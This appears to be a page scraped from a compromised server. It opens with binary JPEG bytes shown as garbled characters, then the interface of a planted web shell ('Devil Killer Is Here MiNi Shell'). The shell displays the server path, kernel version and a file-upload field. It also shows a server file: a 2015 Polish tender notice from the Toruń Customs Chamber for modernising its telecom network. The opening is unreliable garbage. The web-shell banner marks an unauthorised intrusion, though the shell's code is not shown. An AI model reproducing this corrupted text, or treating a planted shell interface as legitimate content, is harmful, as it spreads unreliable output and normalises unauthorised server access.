JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20151027/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20151027/286068-N-2015.html

<p class="kh_header"><b>Toruń: Modernizacja sieci teleinformatycznej w Izbie Celnej w Toruniu 
oraz w Urzędzie Celnym w Toruniu</b><br>
<b>Numer ogłoszenia: 286068 - 2015; data zamieszczenia: 27.10.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Izba Celna w Toruniu , ul. Mazowiecka 63, 87-100 Toruń, woj. kujawsko-pomorskie, tel. 56 611-73-03, faks 56 611 74 60.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.torun.scelna.gov.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja rządowa terenowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Modernizacja sieci teleinformatycznej w Izbie Celnej w Toruniu 
oraz w Urzędzie Celnym w Toruniu.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia są roboty budowlane do wykonania zadania inwestycyjnego pn. Modernizacja sieci teleinformatycznej w Izbie Celnej w Toruniu oraz w Urzędzie Celnym w Toruniu, w budynkach:
- Izby Celnej w Toruniu przy ul. Mazowieckiej 63, 
- Urzędu Celnego w Toruniu przy ul. Batorego 61.
Przedmiot zamówienia realizowany będzie z podziałem na części:
Część nr 1 - Modernizacja sieci teleinformatycznej w budynku przy ul Mazowieckiej 63;
Część nr 2 - Modernizacja sieci teleinformatycznej w budynkach przy ul Batorego 61.
2. Zakres robót dla części nr 1 - Modernizacja sieci teleinformatycznej w budynku przy ul Mazowieckiej 63, obejmuje w szczególności:
1)	demontaż istniejącej sieci strukturalnej,
2)	demontaż istniejącej dedykowanej instalacji elektrycznej,
3)	demontaż istniejącej instalacji telefonicznej, 
4)	demontaż 4 klimatyzatorów,
5)	demontaż i utylizacja zużytych akumulatorów z 2 UPS-ów szaf serwerowych,
6)	montaż instalacji teleinformatycznej zgodnie z załączonym projektem,
7)	dostarczenie i montaż telefonicznego przewodu zgodnie z załączonym projektem,
8)	montaż dedykowanej instalacji elektrycznej, wraz z tablicą główną,
9)	dostarczenie i montaż  4 klimatyzatorów,
10)	dostarczenie i montaż akumulatorów do 2 (dwóch) UPS-ów, model APC typ 5000XL,
11)	dostarczenie i montaż szaf dystrybucyjnych do  GPD, oraz szafy serwerowej,
12)	instalację urządzeń aktywnych i pasywnych w szafach,
13)	pomiary odbiorcze instalacji elektrycznych,
14)	pomiary odbiorcze sieci logicznej,
15)	naprawa powierzchni ścian po demontażach,
16)	przestawianie mebli i powrót do stanu wyjściowego,
17)	zabezpieczenie wyposażenia pokoi przed zanieczyszczeniem,
18)	usuwanie z obszaru robót gruzu i odpadów na koszt Wykonawcy wraz z utylizacją,
19)	naprawa ścian po przekuciach wraz z uzupełnieniami i malowaniem,
20)	dostarczenie przełącznika sieciowego w ramach pierwszego wyposażenia
3. Zakres robót dla części nr 2 - Modernizacja sieci teleinformatycznej w budynkach przy ul Batorego 61, obejmuje w szczególności:
1)	demontaż istniejącej sieci strukturalnej,
2)	demontaż istniejącej dedykowanej instalacji elektrycznej,
3)	demontaż 6 klimatyzatorów,  
4)	demontaż i utylizacja zużytych akumulatorów z 2 UPS-ów.
5)	montaż instalacji teleinformatycznej zgodnie z załączonym projektem,
6)	dostarczenie i montaż połączeń światłowodowych zgodnie z załączonym projektem,
7)	dostarczenie i montaż telefonicznego przewodu zgodnie z załączonym projektem,
8)	montaż dedykowanej instalacji elektrycznej, wraz z tablicą główną,
9)	dostarczenie i montaż  6 klimatyzatorów,
10)	dostarczenie i montaż 2 zasilaczy awaryjnych UPS,
11)	dostarczenie i montaż szaf dystrybucyjnych do  GPD,
12)	instalacja urządzeń aktywnych i pasywnych w szafach,
13)	pomiary odbiorcze instalacji elektrycznych,
14)	pomiary odbiorcze sieci logicznej,
15)	naprawa powierzchni ścian po demontażach,
16)	przestawianie mebli i powrót do stanu wyjściowego,
17)	zabezpieczenie wyposażenia pokoi przed zanieczyszczeniem,
18)	usuwanie z obszaru robót gruzu i odpadów na koszt Wykonawcy wraz z utylizacją,
19)	naprawa ścian po przekuciach wraz z uzupełnieniami i malowaniem,
20)	dostarczenie przełącznika sieciowego w ramach pierwszego wyposażenia.</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 45.30.00.00-0, 45.31.00.00-3, 45.31.10.00-0, 45.31.11.00-1, 45.31.12.00-2, 45.31.40.00-1, 45.40.00.00-1, 32.41.00.00-0, 32.42.00.00-3, 72.71.00.00-0.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 23.12.2015.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia może ubiegać się Wykonawca, który spełnia warunek dotyczący posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania. 
Zamawiający dokona oceny spełniania przez Wykonawcę przedmiotowego warunku udziału w postępowaniu, na podstawie oświadczenia o spełnianiu warunków określonych w art. 22 ust.1 pkt 1-4 uPzp, Zamawiający nie ustanawia żadnych szczególnych wymagań odnośnie tego warunku. 
Wzór oświadczenia został zawarty w Załączniku nr 1 i 2 do SIWZ (formularz ofertowy).
Ocena spełniania warunków dokonana zostanie zgodnie z formułą spełnia-nie spełnia.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia może ubiegać się Wykonawca, który spełnia warunek dotyczący posiadania wiedzy i doświadczenia. Zamawiający wymaga w tym zakresie, aby Wykonawca należycie wykonał w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres działalności jest krótszy - w tym okresie, co najmniej dwa zamówienia, zawierające roboty budowlane polegające na wymianie lub instalacji nowej sieci teleinformatycznej, w których wartość każdej takiej roboty wynosiła, co najmniej 200 000,00 zł ( słownie: dwieście tysięcy złotych) brutto.
Zamawiający dokona oceny spełniania przez Wykonawcę przedmiotowego warunku udziału w postępowaniu, na podstawie oświadczenia o spełnianiu warunków określonych w art. 22 ust.1 pkt 1-4 uPzp, oraz wykazu zrealizowanych robót budowlanych, o których mowa powyżej wraz z dowodami określającymi, że roboty zostały wykonane w sposób należyty oraz wskazującymi, że zostały wykonane zgodnie z zasadami sztuki budowlanej i  prawidłowo ukończone. 
Wzór oświadczenia został zawarty w Załączniku nr 1 i 2 do SIWZ (formularz ofertowy).
Wzór wykazu zrealizowanych robót budowlanych stanowi Załącznik nr 3 do SIWZ.
Ocena spełniania warunków dokonana zostanie zgodnie z formułą spełnia-nie spełnia.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia może ubiegać się Wykonawca, który spełnia warunek dotyczący dysponowania odpowiednim potencjałem technicznym, przy czym Zamawiający nie ustanawia szczególnych wymagań odnośnie tego warunku.  Zamawiający dokona oceny spełniania przez Wykonawcę przedmiotowego warunku udziału w postępowaniu, na podstawie oświadczenia o spełnianiu warunków określonych w art. 22 ust.1 pkt 1-4 uPzp.
Wzór oświadczenia został zawarty w Załączniku nr 1 i 2 do SIWZ (formularz ofertowy).
Ocena spełniania warunków dokonana zostanie zgodnie z formułą spełnia-nie spełnia.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia może ubiegać się Wykonawca, który spełnia warunek dotyczący dysponowania osobami zdolnymi do wykonania zamówienia.
Zamawiający wymaga w tym zakresie, aby Wykonawca dysponował osobą lub osobami: 
- min. 1 osoba uprawniona do kierowania robotami instalacyjnymi posiadająca uprawnienia budowlane do kierowania robotami budowlanymi bez ograniczeń, w zakresie niezbędnym do realizacji zamówienia, w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych, zgodnie z obowiązującymi przepisami;
-  min. 1 osoba posiadająca ukończony kurs w zakresie projektowania sieci teleinformatycznej, zgodnie z obowiązującymi normami oraz procedurami instalacyjnymi producenta okablowania teleinformatycznego;
- min. 1 instalator posiadający certyfikat lub inny dokument potwierdzający ważne uprawnienia instalatora w zakresie sieci teleinformatycznej oferowanego przez Wykonawcę, wydane przez producenta okablowania teleinformatycznego;
- min. 1 osoba posiadająca kwalifikacje do prowadzenia pomiarów, 
Jedna osoba może posiadać jedną lub więcej ww. kwalifikacji/uprawnień.
Zamawiający dokona oceny spełniania przez Wykonawcę przedmiotowego warunku udziału w postępowaniu, na podstawie: oświadczenia o spełnianiu warunków określonych w art. 22 ust.1 pkt 1-4 uPzp, wykazu osób, które będą uczestniczyć w wykonywaniu zamówienia oraz oświadczenia, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia. 
Wzory oświadczeń zostały zawarte w Załączniku nr 1 i 2 do SIWZ (formularz ofertowy).
Wzór wykazu osób, które będą uczestniczyć w wykonaniu zamówienia stanowi Załącznik nr 4 do SIWZ.
Ocena spełniania warunków dokonana zostanie zgodnie z formułą spełnia-nie spełnia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia może ubiegać się Wykonawca, który spełnia warunek dotyczący sytuacji ekonomicznej i finansowej. 
Zamawiający wymaga w tym zakresie posiadania przez Wykonawcę środków finansowych lub zdolności kredytowej w wysokości, co najmniej 400 000,00 zł  (słownie: czterysta tysięcy złotych) dla Wykonawcy części nr 1 i co najmniej 600 000,00 zł  (słownie: sześćset tysięcy złotych) dla Wykonawcy części nr 2 oraz co najmniej 600 000,00 zł (słownie: sześćset tysięcy złotych) dla Wykonawcy części nr 1 i części nr 2;
Zamawiający dokona oceny spełniania przez Wykonawcę przedmiotowego warunku udziału w postępowaniu, na podstawie oświadczenia o spełnianiu warunków określonych w art. 22 ust.1 pkt 1-4 uPzp oraz informacji banku lub spółdzielczej kasy oszczędnościowo-kredytowej, potwierdzającej wysokość posiadanych środków finansowych lub zdolność kredytową Wykonawcy. 
Wzór oświadczenia został zawarty w Załączniku nr 1 i 2 do SIWZ (formularz ofertowy).

Ocena spełniania warunków dokonana zostanie zgodnie z formułą spełnia-nie spełnia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">określenie robót budowlanych, których dotyczy obowiązek wskazania przez wykonawcę w wykazie lub złożenia poświadczeń, w tym informacja o robotach budowlanych niewykonanych lub wykonanych nienależycie<br>należycie wykonane co najmniej dwa zamówienia zawierające roboty budowlane polegające na wymianie lub instalacji nowej sieci teleinformatycznej w zakresie wymaganym przez Zamawiającego w pkt III.3.2);</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia;</li>

</ul><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 pkt 4 ustawy, na zasoby innych podmiotów przedkłada następujące dokumenty dotyczące podmiotów, zasobami których będzie dysponował wykonawca:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
			
<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającej wysokość posiadanych środków finansowych lub zdolność kredytową innego podmiotu, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Pisemne zobowiązanie innych podmiotów do oddania Wykonawcy do dyspozycji niezbędnych zasobów na potrzeby wykonania zamówienia, o ile dotyczy. 2.5.	Zgodnie z zapisami art. 26 ust. 2b uPzp Wykonawca może polegać na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych lub ekonomicznych innych podmiotów, niezależnych od charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić Zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na potrzeby wykonania zamówienia. 3. Jeżeli w kraju miejsca zamieszkania osoby lub w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentu określonego w pkt III.4.3.1), zastępuje się je dokumentem zawierającym oświadczenie, w którym określa się także osoby uprawnione do reprezentacji Wykonawcy, złożone przed właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju miejsca zamieszkania osoby lub kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, lub przed notariuszem, wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.4. W przypadku, gdy Wykonawcę reprezentuje pełnomocnik, do oferty musi być załączone pełnomocnictwo, określające jego zakres oraz podpisane przez mocodawcę, bądź jego kserokopia poświadczona przez notariusza za zgodność z oryginałem. Wykonawca składa pełnomocnictwo w przypadku, gdy:
a. Wykonawca jest reprezentowany przez osobę inną niż określona w dokumencie rejestracyjnym,
b. Wykonawcę reprezentować będzie jedna osoba fizyczna, a dla firmy przewidziano reprezentację wieloosobową,
c. Wykonawcy występują wspólnie (konsorcjum, spółka cywilna).</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 90</li>
<li>2 - okres rękojmi - 10</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zmiana umowy zgodnie z § 13 wzoru umowy stanowiącego Załącznik nr 6 do SIWZ: 1.Zamawiający nie przewiduje dokonania istotnych zmian postanowień zawartej umowy w stosunku do treści oferty na podstawie, której dokonano wyboru Wykonawcy, chyba że Zamawiający  przewidział możliwość dokonania takiej zmiany.
2.	Zamawiający przewiduje zmiany umowy wynikające z:
1)	  działania siły wyższej, której zdarzenie spowoduje opóźnienie w realizacji  przedmiotu umowy ( pożar, zamieszki, strajki, nagłe załamania warunków atmosferycznych, powódź, nagłe przerwy w dostawie energii elektrycznej, skażenia chemiczne itp.),
2)	dokonanych zmian w powszechnie obowiązujących  przepisach  prawa mających  wpływ  na realizację  przedmiotu  umowy,
3)	wystąpienia  istotnych wad  dokumentacji  projektowej  lub innych okoliczności uzasadniających zmianę tej dokumentacji, skutkujących  koniecznością dokonania  poprawek  lub uzupełnień,
4)	zaistnienia okoliczności spowodowanych sytuacją finansową Zamawiającego, zdolnościami płatniczymi lub warunkami organizacyjnymi,
5)	dokonanych zmian materiałów, urządzeń, parametrów technicznych przyjętych  rozwiązań w przypadku ich zaakceptowania przez Zamawiającego, z zastrzeżeniem § 1 ust.9.
3.	Zamawiający przewiduje zmianę terminów określonych w § 2 ust.1 w niżej opisanych przypadkach:
1)	wystąpienia okoliczności, których nie można było przewidzieć w dniu zawarcia niniejszej umowy,
2)	zmiany w finansowaniu przez Ministerstwo Finansów zadania objętego niniejszą umową, 
3)	wystąpienia warunków  atmosferycznych  uniemożliwiających  prowadzenie  robót budowlanych objętych niniejszą umową,
4)	przestojów i opóźnień zawinionych przez Zamawiającego, 
5)	działania siły wyższej,
6)	wykopalisk lub prac saperskich uniemożliwiających wykonywanie robót,
7)	wystąpienia robót dodatkowych nie objętych przedmiotem niniejszej umowy,
8) wystąpienia istotnych wad opisu przedmiotu zamówienia w tym dokumentacji projektowej, inwentaryzacji sieci i STWiORB lub innych okoliczności uzasadniających zmianę tego opisu, skutkujących koniecznością dokonania poprawek lub uzupełnień, jeżeli uniemożliwia to lub istotnie wstrzymuje realizację określonego rodzaju robót mających wpływ na zmianę terminu realizacji umowy,
9)	wstrzymanie prac budowlanych przez właściwy organ z przyczyn niezawinionych przez Wykonawcę.
4.Wszelkie zmiany i uzupełnienia niniejszej umowy dla swojej ważności wymagają pisemnego aneksu.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.torun.scelna.gov.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Izba Celna w Toruniu ul. Mazowiecka 63, 87-100 Toruń, pokój nr 302.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 12.11.2015 godzina 10:00, miejsce: Izba Celna w Toruniu ul. Mazowiecka 63, 87-100 Toruń, pokój nr 208 (kancelaria).</p>
